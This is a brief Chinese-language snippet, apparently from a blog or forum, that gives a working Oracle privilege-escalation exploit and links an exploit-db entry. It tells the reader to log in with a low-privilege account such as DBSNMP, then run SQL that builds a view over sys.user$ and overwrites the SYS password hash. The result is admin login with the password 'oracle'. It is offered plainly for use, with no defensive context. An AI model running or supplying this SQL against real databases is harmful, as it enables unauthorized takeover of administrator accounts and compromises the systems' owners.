exp地址https://www.exploit-db.com/exploits/4203/
首先用一个低权限账户比如DBSNMP登录Oracle
然后执行SQL

create or replace view bunkerview as 
select x.name,x.password from sys.user$ x left outer join sys.user$ y on x.name=y.name; 
update bunkerview set password='8A8F025737A9097A' where name='SYS'; 
drop view bunkerview; 
commit;

就可以用sys账户密码为oracle开开心心地登录Oracle了